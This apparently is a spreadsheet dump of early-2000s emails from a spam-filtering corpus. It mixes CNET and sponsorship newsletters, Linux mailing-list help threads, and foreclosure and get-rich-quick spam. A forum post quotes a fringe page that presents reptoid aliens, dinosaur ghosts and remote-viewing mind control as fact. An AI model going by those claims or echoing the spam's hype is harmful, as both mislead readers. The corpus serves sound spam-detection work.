 								&amp;nbsp;&amp;nbsp;&lt;B&gt;Just &lt;font color="#CC0000"&gt;$312&lt;/font&gt;&lt;/B&gt;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href="http://clickthru.online.com/Click?q=3f-4sAEIqMWSI0Dpn-Hcoh57BymNzZR" &gt;&lt;img border=0 src="http://shopper.cnet.com/i/co/ps/120/8602250_120_1.gif"&gt;&lt;/a&gt;
 								&lt;/td&gt;
 								&lt;td width=270 colspan="1" valign="center"&gt;
 								&lt;font face="arial, helvetica" size="-1" &gt;
 								&lt;a href="http://clickthru.online.com/Click?q=54-l6ovIZKA72_p4Ae0O9U4lR0vdknR" &gt;&lt;B&gt;Palm i705&lt;/b&gt;&lt;/a&gt;&lt;BR&gt;
 								&amp;#149; 8MB, USB, rechargeable&lt;BR&gt;
 								&amp;#149; Wireless Internet access&lt;BR&gt;
 								&amp;#149; Always-on e-mail&lt;BR&gt;
 								&amp;nbsp;&amp;nbsp;&lt;B&gt;Just &lt;font color="#CC0000"&gt;$299&lt;/font&gt;&lt;/B&gt;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href="http://clickthru.online.com/Click?q=69-CY-iIoWgaOiw_fyMoAH4OpRzLxrR" &gt;&lt;img border=0 src="http://shopper.cnet.com/i/co/ps/120/8489836_120_1.gif"&gt;&lt;/a&gt;
 								&lt;/td&gt;
 								&lt;td width=270 colspan="1" valign="center"&gt;
 								&lt;font face="arial, helvetica" size="-1" &gt;
 								&lt;a href="http://clickthru.online.com/Click?q=7f-bn6KIIP6RbGSxYq9IO3JewkhBpPR" &gt;&lt;B&gt;Sony CLIE PEG-T615C&lt;/b&gt;&lt;/a&gt;&lt;BR&gt;
 								&amp;#149; 16MB, USB, rechargeable&lt;BR&gt;
 								&amp;#149; 16-bit color display&lt;BR&gt;
 								&amp;#149; Palm OS 4.1&lt;BR&gt;
 								&amp;nbsp;&amp;nbsp;&lt;B&gt;Just &lt;font color="#CC0000"&gt;$251&lt;/font&gt; &lt;/B&gt;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href="http://clickthru.online.com/Click?q=94-rOVNQaI7VuW_bBbJ5elUjfr5JQdR" &gt;&lt;img border=0 src="http://shopper.cnet.com/i/co/ps/120/9789407_120_1.gif"&gt;&lt;/a&gt;
 								&lt;/td&gt;
 								&lt;td width=270 colspan="1" valign="center"&gt;
 								&lt;font face="arial, helvetica" size="-1" &gt;
 								&lt;a href="http://clickthru.online.com/Click?q=a9-IlbqQpUxnPyRjlDz2JQZv91zVMcR" &gt;&lt;B&gt;Toshiba Pocket PC e310&lt;/b&gt;&lt;/a&gt;&lt;BR&gt;
 								&amp;#149; Powerful mobile productivity&lt;BR&gt;
 								&amp;#149; 3.5-inch TFT display/65K colors&lt;BR&gt;
 								&amp;#149; Plays MP3/video files&lt;BR&gt;
 								&amp;nbsp;&amp;nbsp;&lt;B&gt;Just &lt;font color="#CC0000"&gt;$329&lt;/font&gt; &lt;/B&gt;
 								&lt;/td&gt;
 							&lt;/tr&gt;
 							&lt;tr&gt;
 								&lt;td colspan="2" background="http://www.cnet.com/i/sh/leaf/dots5x7.gif"&gt;&lt;img src="http://www.cnet.com//b.gif" width="409" height="5" alt="" /&gt;&lt;/td&gt;
 							&lt;/tr&gt;
 							&lt;tr&gt;
 								&lt;td width="400" colspan="2"&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=5&gt;&lt;/td&gt;
 							&lt;/tr&gt;	
 &lt;!-- Product 6 --&gt;
 							&lt;tr valign="top"&gt;
 								&lt;td width="120"&gt;
 									&lt;a href="http://clickthru.online.com/Click?q=be-B7ixQCpTplAONfJbnY9y52GfwHRR" &gt;&lt;img border=0 src="http://shopper.cnet.com/i/co/ps/120/7934746_120_1.gif"&gt;&lt;/a&gt;
 								&lt;/td&gt;
 								&lt;td width=270 colspan="1" valign="center"&gt;
 								&lt;font face="arial, helvetica" size="-1" &gt;
 								&lt;a href="http://clickthru.online.com/Click?q=d3-GZHkQJPaYBLRH63K74p01K7fy3FR" &gt;&lt;B&gt;Compaq iPaq H3835&lt;/b&gt;&lt;/a&gt;&lt;BR&gt;
 								&amp;#149; Free shipping available&lt;BR&gt;
 								&amp;#149; 64MB, brilliant TFT screen&lt;BR&gt;
 								&amp;#149; 206MHz Intel processor&lt;BR&gt;
 								&amp;nbsp;&amp;nbsp;&lt;B&gt;Just &lt;font color="#CC0000"&gt;$425&lt;/font&gt;&lt;/B&gt;
 								&lt;/td&gt;
 							&lt;/tr&gt;
 									&lt;tr&gt;
 								&lt;td colspan="2" background="http://www.cnet.com/i/sh/leaf/dots5x7.gif"&gt;&lt;img src="http://www.cnet.com//b.gif" width="409" height="5" alt="" /&gt;&lt;/td&gt;
 							&lt;/tr&gt;
 							&lt;tr&gt;
 								&lt;td width="400" colspan="2"&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=5&gt;&lt;/td&gt;
 							&lt;/tr&gt;	
 &lt;!-- Product 7 --&gt;
 							&lt;tr valign="top"&gt;
 								&lt;td width="120"&gt;
 									&lt;a href="http://clickthru.online.com/Click?q=e8-DOJMQfk8UQHBe0irAP_kMFIM559R" &gt;&lt;img border=0 src="http://shopper.cnet.com/i/co/ps/120/9062023_120_1.gif"&gt;&lt;/a&gt;
 								&lt;/td&gt;
 								&lt;td width=270 colspan="1" valign="center"&gt;
 								&lt;font face="arial, helvetica" size="-1" &gt;
 								&lt;a href="http://clickthru.online.com/Click?q=fd-BXDMQgOr1rPdyPTO_Iti64Q9t8uR" &gt;&lt;B&gt;Sony CLIE PEG-NR70V&lt;/b&gt;&lt;/a&gt;&lt;BR&gt;
 								&amp;#149; Built-in digital camera/MP3 &lt;BR&gt;
 								&amp;#149; Built-in keyboard/color display&lt;BR&gt;
 								&amp;#149; 16MB, Palm OS 4.1&lt;BR&gt;
 								&amp;nbsp;&amp;nbsp;&lt;B&gt;Just &lt;font color="#CC0000"&gt;$517&lt;/font&gt;&lt;/B&gt;
 								&lt;/td&gt;
 							&lt;/tr&gt;
 							&lt;tr&gt;
 								&lt;td colspan="2" background="http://www.cnet.com/i/sh/leaf/dots5x7.gif"&gt;&lt;img src="http://www.cnet.com//b.gif" width="409" height="5" alt="" /&gt;&lt;/td&gt;
 							&lt;/tr&gt;
 							&lt;tr&gt;
 								&lt;td width="400" colspan="2"&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=5&gt;&lt;/td&gt;
 							&lt;/tr&gt;		
 &lt;!-- Product 8 --&gt;
 							&lt;tr valign="top"&gt;
 								&lt;td width="120"&gt;
 									&lt;a href="http://clickthru.online.com/Click?q=12-jaAKIl-XYrsQcK9-pEvKY-qkCKsR" &gt;&lt;img border=0 src="http://shopper.cnet.com/i/co/ps/120/7344382_120_1.gif"&gt;&lt;/a&gt;
 								&lt;/td&gt;
 								&lt;td width=270 colspan="1" valign="center"&gt;
 								&lt;font face="arial, helvetica" size="-1" &gt;
 								&lt;a href="http://clickthru.online.com/Click?q=27-z9ZmIqI2G9udMulSkMRUVolYrBZR" &gt;&lt;B&gt;Compaq iPaq H3870 &lt;/b&gt;&lt;/a&gt;&lt;BR&gt;
 								&amp;#149; Incl. MS Pocket PC 2002&lt;BR&gt;
 								&amp;#149; 64MB, integrated Bluetooth&lt;BR&gt;
 								&amp;#149; 206MHz, 64K color, USB&lt;BR&gt;
 								&amp;nbsp;&amp;nbsp;&lt;B&gt;Just &lt;font color="#CC0000"&gt;$539&lt;/font&gt;&lt;/B&gt;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 empowers you to compare 
 detailed product specifications feature-for-feature? 
 &lt;P&gt;
 Select the items you wish to compare from your customer-
 specific catalog of more than 250,000 SKUs. The product 
 comparison highlights differences between the products 
 in red, allowing your sales reps and customers to easily 
 identify the main differences between each product selected. 
 This comparison can then be e-mailed to your customers to 
 assist them in making a more informed buying decision.
 &lt;P&gt;
 &lt;a href="http://clickthru.online.com/Click?q=3d-oi9NIbz4YT_zaYivwlGWUTnaNtuR" &gt;&lt;B&gt;Sign up now&lt;/b&gt;&lt;/a&gt; to gain access to the most complete, accurate, 
 and timely product data available. 
  &lt;P&gt;
 &lt;a href="http://clickthru.online.com/Click?q=52-LUXoIrJtd9bBUwyMWz8AtIQwjjsR" &gt;&lt;B&gt;Tell me more about ChannelOnline.&lt;/b&gt;&lt;/a&gt;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href="http://clickthru.online.com/Click?q=67-PnDkIOEDqyXwwAeWhKPAKa1CPIPR" &gt;Tech Trends&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=7c-7NCZIZWcc3qfpTLfLHDx1984BOnR" &gt;Hardware&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=91-EZnpQAzyNQDW46rMzb-Byo4hJdcR" &gt;Software&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=a6-9zw4QCUBWOWrRttOvAKcnvjbgwRR" &gt;Shopping&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=bb-yT94QYZB7w7qFcaRaT-Dc13yE_FR" &gt;Downloads&lt;/a&gt;
 					&lt;/ul&gt;&lt;/b&gt;
 				&lt;/font&gt;
 			&lt;/td&gt;
 			&lt;td&gt;
 				&lt;font face="arial, helvetica" size="-1"&gt;&lt;b&gt;
 					&lt;ul&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=d0-vjDhQWWF8jxS0mE7c7YuNDxuyC9R" &gt;News&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=e5-9Z7OQgyw2t53OMDjnbcumX6cvbuR" &gt;Investing&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=fa-FmqNQhO2iI0PUIytvDA4oSMpoLsR" &gt;Electronics&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=10-YU9qI9NwJArGHOOPffACEH5fCA9R" &gt;Web Building&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=25-inepIbdXXmz_vxOZTscR7jeQrFuR" &gt;Help &amp; How-Tos&lt;/a&gt;
 					&lt;/ul&gt;&lt;/b&gt;
 				&lt;/font&gt;
 			&lt;/td&gt;
 			&lt;td&gt;
 				&lt;font face="arial, helvetica" size="-1"&gt;&lt;b&gt;
 					&lt;ul&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=3a-QAmgIrzDr8GPoyx7JR1rqAFZcCsR" &gt;Internet&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=4f-Iar4IIU81v_OSov8g-rrsLKFK0PR" &gt;Games&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=64-UBOhIuLfNZVnMQsNGWF8w6YrPhnR" &gt;Message Boards&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=79-rsQHIEBf9LjQX4wmFz_e0CvgparR" &gt;CNET TV &amp; Radio&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=8e-Ve-cQCn7KTCjMntPDuYWD0V_WyRR"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HREF='http://clickthru.online.com/Click?q=a4-HGwsr0pzzzXWagl21iBY955q-skPkHdRR'&gt;Unsubscribe&lt;/A&gt;&amp;nbsp;|
 &amp;nbsp;&lt;a href='http://nl.com.com/servlet/url_login?email=qqqqqqqqqq-cnet-newsletters@spamassassin.taint.org&amp;brand=cnet'&gt;Manage My Subscriptions&lt;/a&gt;
 &amp;nbsp;|&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=b9-WWcsQ-BazXmeBp7h8FdMkmoOwzcR" &gt;FAQ&lt;/A&gt;&amp;nbsp;|
 &amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=ce-Sd0CQMsxOogLDkn3ufz1Jey2fPRR"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href="http://clickthru.online.com/Click?q=e3-ze2WQkVk8AY_Y82-JM2mPpt29eFR" &gt;&lt;img src="http://www.cnet.com/i/dp/smrb.gif" width="37" height="37" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width="563" nowrap&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=f8-57BSQfsXnX9bFQDpiaRL6DCwol9R" &gt;&lt;font color="#000000"&gt;Price comparisons&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=0d-3aGuIbr2qGY1CohNv0T0QkY6b7uR" &gt;&lt;font color="#000000"&gt;Product reviews&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=22-xNrrIrdA8_cbyUtuo4I9yc99NcsR" &gt;&lt;font color="#000000"&gt;Tech news&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=37-EMLQIqzF4e51Ed0Q93KjZ6eJcnZR" &gt;&lt;font color="#000000"&gt;Downloads&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=4c-jxi2IZpIbkXUVRuAu7hgvo2AKenR"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src="http://gserv-cnet.zdnet.com/clear/outbound.gif?APPID=2&amp;EMID=25136487&amp;NL=e442&amp;ISSUE=2002-07-17" height=1 width=1&gt;    &lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;  &lt;td colspan=2&gt;&lt;font face=Arial, Helvetica, sans-serif size=2&gt;    &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- ### /footer ### --&gt;
 &lt;IMG HEIGHT=1 WIDTH=1 SRC="http://clickthru.online.com/Click?q=62-4oEinrPkUIKKa441thLdJkS2UdRR"&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">On Friday 02 August 2002 09:41, Gregory McRandal (ext 722) wrote:
 &gt; Hi,
 &gt;
 &gt; I've installed Quake 3 onto my computer and it starts to run up ok but as
 &gt; soon as the graphics start it bails out.  It complains that there is an
 &gt; error in sis_drv.o,  the line before this says that it is starting Quake in
 &gt; 24 bit depth, now from http://www.winischhofer.net/linuxsis630.shtml I
 &gt; understand that the sis630 won't do 24 bit depth.  So is there a way to
 &gt; make Quake start up in 16 bit depth?  I've done some "google"ing but drawn
 &gt; a blank.....
 &gt;
 &gt; Thanks
 &gt;
 &gt; Greg
 If your card has its own MesaGL drivers it may want you to remove the one in 
 the Quake directory (certainly NVidia cards do this). Have a look at the docs 
 for your card's Linux drivers.
 Bob
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: FREE Foreclosure Search Approved!
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;HTML&gt;
 &lt;head&gt;
 &lt;title&gt;Untitled Document&lt;/title&gt;
 &lt;meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"&gt;
 &lt;/head&gt;
 &lt;body bgcolor="#006394" text="#000000"&gt;
 &lt;table width="100" border="0" cellspacing="0" cellpadding="0"&gt;
   &lt;tr&gt; 
     &lt;td&gt;&lt;a href="http://www.foreclosureworld.net/index2.htm"&gt;&lt;img src="http://www.foreclosuretraining.com/html-email/fw_blue1/blue-fw-header.gif" width="595" height="100" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt; 
     &lt;td align="left" valign="top"&gt; 
       &lt;table width="100" border="0" cellspacing="0" cellpadding="0"&gt;
         &lt;tr&gt; 
           &lt;td align="left" valign="top"&gt;&lt;a href="http://www.foreclosureworld.net/index2.htm"&gt;&lt;img src="http://www.foreclosuretraining.com/html-email/fw_blue1/blue-fw-panel.gif" width="321" height="587" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
           &lt;td&gt;&lt;a href="http://www.foreclosureworld.net/index2.htm"&gt;&lt;img src="http://www.foreclosuretraining.com/html-email/fw_blue1/splashimages.gif" width="321" height="587" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;ul&gt;
   &lt;li&gt;&lt;/li&gt;
 &lt;/ul&gt;
 &lt;/body&gt;
 &lt;/HTML&gt;
 &lt;BR&gt;&lt;BR&gt;
 &lt;TABLE ALIGN="center" BORDER="0" WIDTH="580" CELLSPACING="0" CELLPADDING="0"&gt;&lt;TR&gt;&lt;TD&gt;
 To unsubscribe or change subscriber options click:
 &lt;A HREF="http://www.aweber.com/z/r/?zAwstEwMjJwMzIwM"&gt;click here&lt;/A&gt;&lt;BR&gt;&lt;BR&gt;
 &lt;/TD&gt;&lt;/TR&gt;&lt;/TABLE&gt;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</si>
  <si>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On Thu, 2002-08-22 at 19:10, Troy Engel wrote:
 &gt; Today an apt-get upgrade holds back php (and submodules, like php-imap). 
 &gt;   Running an apt-get install php to see what's up, I get:
 &gt; 
 &gt; # apt-get install php
 &gt; Processing File Dependencies... Done
 &gt; Reading Package Lists... Done
 &gt; Building Dependency Tree... Done
 &gt; The following extra packages will be installed:
 &gt;    curl-devel imap imap-devel mysql mysql-devel php-imap php-ldap postgresql
 &gt;    postgresql-devel postgresql-libs pspell-devel ucd-snmp-devel 
 &gt; ucd-snmp-utils
 &gt;    unixODBC unixODBC-devel
 &gt; The following NEW packages will be installed:
 &gt;    curl-devel imap imap-devel mysql mysql-devel postgresql postgresql-devel
 &gt;    postgresql-libs pspell-devel ucd-snmp-devel ucd-snmp-utils unixODBC
 &gt;    unixODBC-devel
 &gt; The following packages will be upgraded
 &gt;    php php-imap php-ldap
 &gt; 3 packages upgraded, 13 newly installed, 0 to remove(replace) and 1 not 
 &gt; upgraded.
 &gt; 
 &gt; Anyone have an idea what the heck RedHat did here, and why we're now 
 &gt; trying to install a ton of crap I don't want?  (I'm hoping someone else 
 &gt; has chased this down and could save me time... ;) )
 &gt; 
 rh bugzilla 72007
 thats the answer
 -sv
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: July 2002: Veuve Clicquot &gt; SponsorRating &gt;  X-Treme Sponsorship Alert &gt; Tidbits &gt; Special Offers &gt; ...
</t>
  </si>
  <si>
    <t xml:space="preserve">
 ------=_ZnkAvjw6_o9xevs6y_MA
 Content-Type: text/plain
 Content-Transfer-Encoding: quoted-printable
 X-MIME-Autoconverted: from 8bit to quoted-printable by hq.pro-ns.net id g6MKOThX092533
 Dear Reader,
 How has Veuve Clicquot's sponsorship become so successful? Naomi Hancock,=
 =20
 UK PR Manager, tells us all about it in an exclusive interview. Also read=
 =20
 about the launch of SponsorRating, the first sponsorship rating agency,=20
 our unsual transactions of the month, and a "special X-treme" Sponsorship=
 =20
 Alert.
 As this is the last issue for the summer, we wish you a good August and=20
 will be back in September.
 Your comments are always welcome, so please email us at=20
 news@sponsorclick.com.
 All our best,
 Rachael Mark
 Editor
 In this issue:
       1. Sponsorship, How and Why? Veuve Clicquot Speaks=20
       2. Press Release: SponsorClick Launches the First Sponsorship Ratin=
 g=20
 Agency
       3. Unusual Transactions of the Month
       4. Sponsorship Alert Special X-treme
       5. Special Offers: Taylor Nelson Sofr=E8s, BVA, Sport+Markt,=20
 Mediametrie, and more
       6. More Matching Opportunities With SponsorClick
       7. How to Contact SponsorClick?
 =20
 =20
 ---------------------------------------------------------------------=20
 .1. Sponsorship, How and Why? Veuve Clicquot Speaks=20
     Interview with Naomi Hancock, PR Manager, Veuve Clicquot UK - July 10=
 ,=20
 2002
 ---------------------------------------------------------------------=20
 =20
   On the occasion of the Veuve Clicquot Gold Cup Polo in West Sussex,=20
 Naomi Hancock reveals Veuve Clicquot's communication strategy.=20
 =20
 Veuve Clicquot has had a single consistent communication strategy in the=20
 UK for the last 15 years. This has been to associate the brand with the=20
 most glamorous sporting cultural and social events of the English summer =
 -=20
 known locally as The English Season.=20
 Veuve Clicquot has become the Champagne of the Season. We've adapted our=20
 communication to stay at the forefront of fashion, and attitudes to these=
 =20
 events, which combine tradition with the excitement of world class sport.=
 =20
   Does your company consider sponsorship a key marketing/communication=20
 tool?
 Absolutely. Sponsorship enables us to build positive associations for the=
 =20
 brand. But we are not interested in tacking our name onto an event where=20
 the addition does not add real value to the event and vica-versa. We=20
 believe in investing, nurturing, and improving over time.=20
   Can you describe your sponsorship strategy?
 We aim to maximise the perception of Veuve Clicquot as the Champagne of=20
 the Season. Everything we do is designed to build a partnership, and=20
 enhance the valuable efforts of our partners, in their own creation, and=20
 development of their events. Our buzz word is integration, as we seek to=20
 make The Season central to our marketing mix.=20
   Can you describe your sponsorship decision-making process?
 We usually discuss a sponsorship programme for the full year with our=20
 mother company in France. We have flexibility - within our budget and the=
 =20
 frame of The Season - to undertake what we sense to match our values and=20
 the image of Veuve Clicquot. Our role in London is to screen whatever=20
 comes to us and discuss relevant operations internally.
 We have a dedicated PR Group at Veuve Clicquot which makes all decisions=20
 related to our sponsorship. Above a certain threshold our head-office wil=
 l=20
 like to be involved in such a decision.=20
   What are the main criteria on which you base your sponsorship strategy?
 Return on investment is the key criterion for any marketing investment=20
 decision. We would only undertake sponsorship in Season-related events.=20
 This is our rule and frame of investment.
   What objectives are you seeking to achieve through sponsorship?
 Within the Season, we are especially looking to achieve visibility vis-=E0=
 -
 vis our audience, image-transfer, media coverage (all national press,=20
 magazine of all kinds).=20
 Awareness is also key for Veuve Clicquot, so we look to find events that=20
 complement those that we already have, and extend our appeal to people of=
 =20
 similar status, but differing interests.=20
   Please describe one of your sponsorships
 The Eighth Annual Veuve Clicquot Gold Cup Polo, held this month at Cowdra=
 y=20
 Park in West Sussex, is the largest entertainment operation undertaken by=
 =20
 Veuve Clicquot UK each year. This successful sponsorship earns Veuve=20
 Clicquot tremendous media coverage, fabulous exposure to our core target=20
 group and a perfect image transfer as polo is the sports of kings and the=
 =20
 king of sports.
   What's your approximate sponsorship spend per year?
 Significant. Without giving figures, we can say that we spend a large=20
 portion of our communication in sponsorship and support and that we=20
 organize the majority of our communication around the theme of Veuve=20
 Clicquot as the Champagne of the Season, because this is where we are=20
 getting a good return on our investment.
   How do you measure the effectiveness of your sponsorship?
 ------=_ZnkAvjw6_o9xevs6y_MA--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</si>
  <si>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Dinosaurs Eggs and the Origins of Good and Evil
</t>
  </si>
  <si>
    <t xml:space="preserve">One of the most bizarre pages I've seen on the Web. At first I thought it
 might be some sort of back-story to a RPG, but, nope, it looks like somebody
 believes this.
 ===
 http://www.viking-z.org/r20i.htm
 M09. Dinosaurs Eggs and the Origins of Good and Evil.
 DINOSAURS. Reptoid ETs are reported to be 12 foot high crocodiles walking on
 their hind legs. This is a description of a dinosaur. It now appears in
 Remote Viewing that the Reptoid ETs, dinosaurs and dragons are all linked
 together and that they all originated on Earth. The Erideans who are Reptoid
 derivatives have a home planet (in the Eridanus system) like all other ETs.
 The Reptoids have no reported home planet. They also come over as entities
 with little brain who control their bodies directly by spirit. This is a
 description of a ghost or disincarnate entity regardless of how people see
 them. Thus it could be that the Reptoids, Erideans, Nordics, Anunnaki, but
 not the Greys, all have origins on Earth and have a strong link to Earth
 even if they choose to live elsewhere. The Greys do not appear to have a
 renal or urinary system and this points to them not originating on Earth.
 The definitive work on dragons is "The Flight of Dragons" by Peter
 Dickinson. If dragons did exist in the flesh, they did not survive the long
 bow. Targets do not come much bigger.
 Truth is stranger than fiction. Thus the writer's current scenario is that
 there were a race of dinosaurs which developed psychic intelligence to guard
 their eggs and young, and who probably preferred to live underground. They
 survived the wipe out of the dinosaurs 50 million years ago with difficulty.
 They evolved into the Erideans and transferred to a more hospitable planet
 (for them) possibly with the help of another race of ETs who wanted slaves
 but otherwise had no interest in Earth or mind control.
 Thus it appears that the current Reptoids are the Spirits or ghosts of the
 dinosaurs. They must have been powerful to survive 50 million years and also
 to appear to some people. They have appeared to the writer in remote
 viewing. They are living on as vampire entities. Such immortal minds are
 contagious and can easily jump race and species barriers. If they can be
 encouraged to reincarnate, then the power sources of the black magicians and
 mind controllers will disappear. Encouraging them to reincarnate will help
 so called immortal minds to disappear as immortal minds have great
 difficulty surviving reincarnation. Purging people's dinosaurs should remove
 all perverse psychic abilities not under their control. They are a source of
 Satanic Guardian Angels and demons. They control us by owning our psi. Thus
 if we regain ownership of psi, we must relinquish their control and that of
 all other mind controllers. Encourage people to regain ownership of their
 psi.
 THE ORIGINS OF LOVE, HATE AND PURE MALICE. The following scenario appears to
 hold water and can account for the origins of our Universal Subconscious.
 Dinosaurs laid their eggs and buried them either underground or in piles of
 rotting vegetation (a good source of beetles and grubs for young
 hatchelings). They did not sit on their eggs to keep them warm, which made
 them very vulnerable to drastic climate and temperature change. In order to
 keep away predators some at least developed psychic mind control. To do this
 they had to capture ownership of the psi of potential predators. This is an
 act of hatred and outward looking. While a few dinosaurs did develop the
 ability to bear living young, most did not. The dinosaurs got in first and
 so their mind control tends to override all other latter minds. They have
 become the source of all Satans, devils and demons.
 Birds on the other hand developed the ability to sit on their eggs and keep
 them warm. A hen bird normally lays a series of eggs (say one per day) and
 only starts sitting when the clutch is completely laid. Thus all eggs tend
 to hatch together as they all have an equal period of warmth. This is
 primarily an act of love but inward looking. Bearing live young is not
 suitable to a bird of the air. A pregnant pigeon would not fly very far.
 Antarctic penguins tuck a single egg between their legs to keep it warm,
 even if they are standing on ice.
 Mammals developed live bearing of their young which is also primarily an act
 of love and inward looking. This is especially true as a mammalian female
 can not desert her young in the womb in case of emergency as can a bird
 sitting on a nest.
 Dinosaurs developed hate and mind control of others to protect their young,
 while birds and mammals developed love. Birds and mammals certainly do hate
 all enemies of their young, but this is secondary.
 If one wants to purge the sources of malice of say a black magician, then
 purge his dinosaurs and his dinosaur eggs. Unfortunately most of our
 religions are based on dinosaur protection of eggs and thus mind control,
 regardless of the front they put out to the public. Religion tends to
 concentrate on "How to Brainwash your Neighbour". Conscious thought has
 built many mighty empires, theologies and slave control systems out of using
 "How to care for and protect one's young" as a foundation.
 Thus the foulest form of abuse possible is to call something "A load of
 dinosaur's eggs". Purging the dinosaurs and dinosaur's eggs of any entity
 tends to purge all malice back to its roots.
 It looks as if mighty immortal minds have built up from small beginnings,
 aided and abetted by various occultists and other. As they will insist on
 vampiring the living for energy to avoid reincarnation and disturbing the
 serenity of the writer, he encourages them to reincarnate.
 ITEMS FOR INSPECTION. For mind control to take place, then someone must take
 control or ownership of the target's psi and pleasure centres. Check for the
 following.
 Nest of dinosaur's eggs, holy dinosaurs, etc.
 Eggs, controllers or owners in peoples psi, pleasure centres, pain killing
 hormones, abilities, etc.
 Mind machines.
 The original engraving or engram.
 GOD and SATAN appear to be job titles and not entities in their own right. T
 hey appear to be dinosaur engravings or engrams. No doubt dinosaurs were the
 first job holders.
 TIMETRACKS are worth investigating as our complete history from the start of
 time.
 My, our, Man's timetracks, etc.
 The time tracks of the Universe, Universal Subconscious, Galactic
 Subconscious, etc.
 EXTINCT RACES of ETs can cause problems when they live on in vampire mode.
 Their virtues may known to channelers but they can also have vices. Whenever
 one hears of races which have evolved on to higher planes, suspect that the
 higher plane is a vampire one. One may never know what they looked like or
 other basic characteristics, which makes linking back a trifle difficult.
 Every extinct race, etc.
 BLOOD ANCESTORS are also worth investigating as minds can be passed down via
 genetic linkages. Some of these can be over 2,000 years old.
 Every blood ancestor, ancestral mind, genetic mind, etc.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Free info.  Start your Own Internet Consulting Business NTSJ
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Did you know 4 of the country's 10 richest people never graduated from college?
 They had the courage to dream, and the wisdom to
 take advantage of opportunities.
 Do you have the Courage and the Wisdom to 
 change YOUR life?
 YOU DESERVE SUCCESS!
 Checking out this web site is free, and it could pay off in the form of
 a dramatically improved lifestyle for you and your loved ones.
 You will never know unless you check it out NOW!
 Invest JUST ONE minute to check out this website right now.
 http://www.22freewayexit2284.net/index7.html
 If you would like to be removed from all future mailings just
 send and email to erienw3943@freemail.hu
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: inbox mail notification broken
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Hi,
 I am experiencing a strange problem since a couple of days now,
 I have several folders with unseen sequences, and when there is
 new mail they are highlighted. This works fine.
 But .. since a couple of days the actual inbox won't be highlighted
 any more when there is new mail. On the other hand the unseen window
 still indicates if there is new mail in the inbox.
 All other folders seem to work properly.
 Any hints ?
   Marc Baaden
 -- 
  Dr. Marc Baaden - Laboratory of Molecular Biophysics, Oxford University
  mailto:baaden@smplinux.de  - ICQ# 11466242 -  http://www.marc-baaden.de
  FAX/Voice +49 697912 39550  -  Tel: +44 1865 275380  or  +33 609 843217
 _______________________________________________
 Exmh-users mailing list
 Exmh-users@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Greetings from Geocaching.com -
 Recent caches in your area...
 9/2/2002 (Texas)
 Fish Eye View by Silly Squadron
 (Traditional Cache) (GC8917) (2.04 miles NW)
 http://www.geocaching.com/seek/cache_details.asp?ID=35095
 9/2/2002 (Texas)
 Ponce de Leon by Mudbug
 (Traditional Cache) (GC8889) (12.25 miles SW)
 http://www.geocaching.com/seek/cache_details.asp?ID=34953
 10/27/2002 (Texas)
 NTGA Org. Meeting/Class by Wolf Song
 (Event Cache) (GC81C2) (25.8 miles SW)
 http://www.geocaching.com/seek/cache_details.asp?ID=33218
 9/22/2002 (Texas)
 NTGA Organizational Meeting/Class by Wolf Song
 (Event Cache) (GC81C1) (25.8 miles SW)
 http://www.geocaching.com/seek/cache_details.asp?ID=33217
 9/1/2002 (Texas)
